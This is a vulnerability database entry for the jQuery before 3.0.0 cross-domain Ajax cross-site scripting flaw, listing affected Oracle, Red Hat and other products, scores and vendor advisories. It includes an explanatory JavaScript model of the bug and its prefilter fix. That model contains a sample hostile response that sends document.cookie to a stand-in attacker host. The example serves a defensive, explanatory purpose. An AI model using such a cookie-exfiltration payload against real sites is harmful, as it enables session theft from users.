BDU:2023-07675

Published: 27 Jun 2015
Source: fstec
CVSS3: 6.1
CVSS2: 6.4
EPSS: Low

Description

The vulnerability in the jQuery library stems from improper protection of the web page structure (input is not neutralized during page generation). A remote attacker can exploit it to perform cross-site scripting via cross-domain Ajax requests: when $.ajax() is called without the dataType option, a cross-domain response served with a text/javascript Content-Type is executed in the requesting page.
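The mechanism behind this entry, as an added example that is not code from this page, from FSTEC or from jQuery itself: a small JavaScript model of the Content-Type sniffing jQuery before 3.0.0 performs when $.ajax() is called without dataType, next to the 3.0.0-style mitigation expressed as an ajaxPrefilter. The functions modelAjax, inferDataType, isCrossDomain and noCrossDomainScriptPrefilter, the sample page and partner origins, and the hostile response are all constructed for illustration; the contents regexes and the prefilter shape follow jQuery's public API, but this is a stand-in, not the library.

```javascript
// Constructed model of jQuery < 3.0 response-type inference; not jQuery code.
// jQuery's default `contents` table: Content-Type regexes consulted when the
// caller left dataType unset ("*"). The `script` entry is the problem.
function defaultContents() {
  return {
    xml: /\bxml\b/,
    html: /\bhtml/,
    json: /\bjson\b/,
    script: /\b(?:java|ecma)script\b/,
  };
}

// jQuery decides crossDomain by comparing the request URL with the page origin.
function isCrossDomain(pageOrigin, url) {
  return new URL(url, pageOrigin).origin !== pageOrigin;
}

// With dataType "*", the first `contents` regex matching the Content-Type wins;
// a disabled entry (false) is skipped. Falls back to plain text.
function inferDataType(settings, contentType) {
  if (settings.dataType && settings.dataType !== '*') {
    return settings.dataType;
  }
  for (const [type, re] of Object.entries(settings.contents)) {
    if (re && re.test(contentType)) {
      return type;
    }
  }
  return 'text';
}

// Stand-in for $.ajax(): runs prefilters, infers the type, then "converts".
// A "script" result is what jQuery would hand to globalEval(); we append the
// body to `executed` instead of evaluating it, so the example is safe to run.
function modelAjax(settings, response, executed) {
  const s = { dataType: '*', crossDomain: false, contents: defaultContents(), ...settings };
  for (const prefilter of s.prefilters || []) prefilter(s);
  const type = inferDataType(s, response.contentType);
  if (type === 'script') {
    executed.push(response.body); // XSS: attacker-chosen JS runs in the page's origin
    return { type, data: undefined };
  }
  if (type === 'json') {
    try {
      return { type, data: JSON.parse(response.body) };
    } catch (e) {
      return { type, error: 'parsererror' }; // hostile JS is a parse error, not code
    }
  }
  return { type, data: response.body };
}

// The 3.0.0 mitigation expressed as an $.ajaxPrefilter callback (the same
// workaround can be registered on older releases): never infer "script" for a
// cross-domain request. Callers that really want remote code say dataType: 'script'.
function noCrossDomainScriptPrefilter(s) {
  if (s.crossDomain) {
    s.contents.script = false;
  }
}

// Constructed sample: a third-party host (compromised, or reached through a
// redirect the attacker controls) answers an ordinary GET with text/javascript.
const HOSTILE_RESPONSE = {
  contentType: 'text/javascript; charset=utf-8',
  body: "location='https://attacker.example/?c='+encodeURIComponent(document.cookie)",
};

function demo() {
  const pageOrigin = 'https://app.example';          // constructed
  const url = 'https://api.partner.example/widget';   // constructed
  const crossDomain = isCrossDomain(pageOrigin, url);
  const executed = [];
  // 1. jQuery < 3.0 default: no dataType, cross-domain, text/javascript -> executed.
  const vulnerable = modelAjax({ url, crossDomain }, HOSTILE_RESPONSE, executed);
  // 2. Same request behind the prefilter: the body is delivered as plain text.
  const hardened = modelAjax({ url, crossDomain, prefilters: [noCrossDomainScriptPrefilter] },
    HOSTILE_RESPONSE, executed);
  // 3. Explicit dataType: 'json' never consults the Content-Type at all.
  const explicitJson = modelAjax({ url, crossDomain, dataType: 'json' }, HOSTILE_RESPONSE, executed);
  return { crossDomain, vulnerable, hardened, explicitJson, executed };
}

const result = demo();
console.log(JSON.stringify(result, null, 2));
```

Running it shows the vulnerable call classifying the response as script (and the hostile body landing in `executed`), while both the prefilter and an explicit dataType leave it inert. When auditing an application, the useful check is therefore twofold: the bundled jQuery version (below 3.0.0 is affected) and every cross-domain $.ajax()/$.get() call that omits dataType.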

Vendor

Oracle Corp.
Novell Inc.
The jQuery Foundation
NetApp Inc.
AVEVA Software, LLC
Red Hat Inc.
dotCMS LLC
Free software community
Ruby Team

Software name

Enterprise Manager Ops Center
Fusion Middleware MapViewer
Business Process Management Suite
JD Edwards EnterpriseOne Tools
Primavera Unifier
Hospitality Reporting and Analytics
WebCenter Sites
Oracle JDeveloper
Communications Converged Application Server
Communications WebRTC Session Controller
OpenSUSE Leap
Oracle Hospitality Guest Access
Primavera Gateway
Oracle Hospitality Materials Control
Oracle Service Bus
Oracle Healthcare Translational Research
Oracle Retail Customer Insights
Financial Services Analytical Applications Infrastructure
Financial Services Funds Transfer Pricing
Oracle Endeca Information Discovery Studio
Banking Platform
Oracle Retail Invoice Matching
Oracle Hospitality Cruise Fleet Management
jQuery
NetApp SolidFire & HCI Storage Node
InTouch Access Anywhere
Red Hat Data Grid
Red Hat JBoss A-MQ
Red Hat JBoss Fuse
dotCMS
RetireJS
Ruby
Agile Product Lifecycle Management for Process
Communications Interactive Session Recorder
Communications Services Gatekeeper
Enterprise Operations Monitor
Financial Services Data Integration Hub
Financial Services Asset Liability Management
Financial Services Hedge Management and IFRS Valuations
Financial Services Liquidity Risk Management
Financial Services Loan Loss Forecasting and Provisioning
Financial Services Market Risk Measurement and Management
Financial Services Profitability Management
Financial Services Reconciliation Framework
Oracle Healthcare Foundation
Insurance Insbridge Rating and Underwriting
OSS Support Tools
Oracle PeopleSoft Enterprise PeopleTools
Oracle Real-Time Scheduler
Retail Allocation
Oracle Retail Sales Audit
Retail Workforce Management Software
Siebel UI Framework
Oracle Utilities Framework
Oracle Utilities Mobile Workforce Management

Software version

12.2.2 (Enterprise Manager Ops Center)
12.3.3 (Enterprise Manager Ops Center)
12.2.1.3.0 (Fusion Middleware MapViewer)
11.1.1.9.0 (Business Process Management Suite)
12.1.3.0.0 (Business Process Management Suite)
12.2.1.3.0 (Business Process Management Suite)
9.2 (JD Edwards EnterpriseOne Tools)
16.2 (Primavera Unifier)
16.1 (Primavera Unifier)
from 17.1 to 17.12 inclusive (Primavera Unifier)
9.1 (Hospitality Reporting and Analytics)
11.1.1.8.0 (WebCenter Sites)
12.2.1.3.0 (WebCenter Sites)
12.1.3.0.0 (Oracle JDeveloper)
12.2.1.3.0 (Oracle JDeveloper)
before 7.0.0.1 (Communications Converged Application Server)
before 7.2 (Communications WebRTC Session Controller)
15.1 (OpenSUSE Leap)
4.2.0 (Oracle Hospitality Guest Access)
4.2.1 (Oracle Hospitality Guest Access)
18.8 (Primavera Unifier)
15.2 (Primavera Gateway)
16.2 (Primavera Gateway)
17.12 (Primavera Gateway)
18.1 (Oracle Hospitality Materials Control)
12.1.3.0.0 (Oracle Service Bus)
12.2.1.3.0 (Oracle Service Bus)
3.1.0 (Oracle Healthcare Translational Research)
15.0 (Oracle Retail Customer Insights)
16.0 (Oracle Retail Customer Insights)
from 7.3.3 to 7.3.5 inclusive (Financial Services Analytical Applications Infrastructure)
from 8.0.4 to 8.0.7 inclusive (Financial Services Funds Transfer Pricing)
3.2.0 (Oracle Endeca Information Discovery Studio)
2.6.0 (Banking Platform)
2.6.1 (Banking Platform)
2.6.2 (Banking Platform)
11.1.1.9.0 (Oracle JDeveloper)
15.0 (Oracle Retail Invoice Matching)
9.0.11 (Oracle Hospitality Cruise Fleet Management)
before 3.0.0 (jQuery)
- (NetApp SolidFire & HCI Storage Node)
before 2017 Update 2 (InTouch Access Anywhere)
7.3.5 (Red Hat Data Grid)
6.3 R15 (Red Hat JBoss A-MQ)
6.3 R15 (Red Hat JBoss Fuse)
5.1.1 (dotCMS)
- (RetireJS)
2.5 (Ruby)
6.2.0.0 (Agile Product Lifecycle Management for Process)
6.2.1.0 (Agile Product Lifecycle Management for Process)
6.2.2.0 (Agile Product Lifecycle Management for Process)
6.2.3.0 (Agile Product Lifecycle Management for Process)
6.2.3.1 (Agile Product Lifecycle Management for Process)
6.0 (Communications Interactive Session Recorder)
6.1 (Communications Interactive Session Recorder)
6.2 (Communications Interactive Session Recorder)
3.1.0 (Oracle Endeca Information Discovery Studio)
before 6.1.0.4.0 (Communications Services Gatekeeper)
3.4 (Enterprise Operations Monitor)
4.0 (Enterprise Operations Monitor)
from 8.0.0 to 8.0.7 inclusive (Financial Services Analytical Applications Infrastructure)
from 8.0.5 to 8.0.7 inclusive (Financial Services Data Integration Hub)
from 8.0.4 to 8.0.7 (Financial Services Asset Liability Management)
from 8.0.4 to 8.0.7 inclusive (Financial Services Hedge Management and IFRS Valuations)
from 8.0.2 to 8.0.6 inclusive (Financial Services Liquidity Risk Management)
from 8.0.2 to 8.0.7 inclusive (Financial Services Loan Loss Forecasting and Provisioning)
8.0.5 (Financial Services Market Risk Measurement and Management)
8.0.6 (Financial Services Market Risk Measurement and Management)
from 8.0.4 to 8.0.6 inclusive (Financial Services Profitability Management)
8.0.5 (Financial Services Reconciliation Framework)
8.0.6 (Financial Services Reconciliation Framework)
7.1 (Oracle Healthcare Foundation)
7.2 (Oracle Healthcare Foundation)
5.2 (Insurance Insbridge Rating and Underwriting)
5.4 (Insurance Insbridge Rating and Underwriting)
5.5 (Insurance Insbridge Rating and Underwriting)
19.1 (OSS Support Tools)
8.55 (Oracle PeopleSoft Enterprise PeopleTools)
8.56 (Oracle PeopleSoft Enterprise PeopleTools)
8.57 (Oracle PeopleSoft Enterprise PeopleTools)
2.3.0 (Oracle Real-Time Scheduler)
15.0.2 (Retail Allocation)
15.0 (Oracle Retail Sales Audit)
1.60.9 (Retail Workforce Management Software)
1.64.0 (Retail Workforce Management Software)
18.10 (Siebel UI Framework)
18.11 (Siebel UI Framework)
from 4.3.0.1 to 4.3.0.4 (Oracle Utilities Framework)
2.3.0 (Oracle Utilities Mobile Workforce Management)
12.1.3.0 (WebCenter Sites)

Software type

Network software
Application software for information systems
Security software
Operating system
Industrial control system software
Software of a network hardware/software appliance

Operating systems and hardware platforms

Novell Inc. OpenSUSE Leap 15.1

Vulnerability severity level

Medium severity (CVSS 2.0 base score 6.4)
Medium severity (CVSS 3.0 base score 6.1)

Possible remediation measures

Apply the vendor recommendations (for jQuery itself this means upgrading to 3.0.0 or later; where an upgrade is not yet possible, pass an explicit dataType to cross-domain $.ajax() calls so the response Content-Type is never used to select script execution):
For NetApp Inc. products:
https://security.netapp.com/advisory/ntap-20210108-0004/
For jQuery:
https://snyk.io/vuln/npm:jquery:20150627
For InTouch Access Anywhere:
https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04
For Red Hat Inc. products:
https://access.redhat.com/errata/RHSA-2020:0481
https://access.redhat.com/errata/RHSA-2020:0729
For dotCMS:
https://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html
For RetireJS:
https://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html
For OctoberCMS:
https://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html
For openSUSE Leap and Ruby:
https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/message/ZJAMCVFC2KL342QI4W5HGYIZXTNBURQT/
For Oracle Corp. products:
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://www.oracle.com/security-alerts/cpuapr2020.html
https://www.oracle.com/security-alerts/cpujan2020.html
https://www.oracle.com/security-alerts/cpujul2020.html
https://www.oracle.com/security-alerts/cpuoct2020.html
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

Vulnerability status

Confirmed by the vendor

Exploit availability

Data being clarified

Remediation information

The vulnerability has been fixed

Identifiers in other vulnerability description systems

EPSS: 0.09842 (93rd percentile), Low
CVSS3: 6.1 Medium
CVSS2: 6.4 Medium

Related vulnerabilities

CVSS3: 6.1
ubuntu
more than 7 years ago

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

CVSS3: 6.1
redhat
almost 10 years ago

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

CVSS3: 6.1
nvd
more than 7 years ago

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

CVSS3: 6.1
msrc
5 months ago

No description available

CVSS3: 6.1
debian
more than 7 years ago

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attack ...
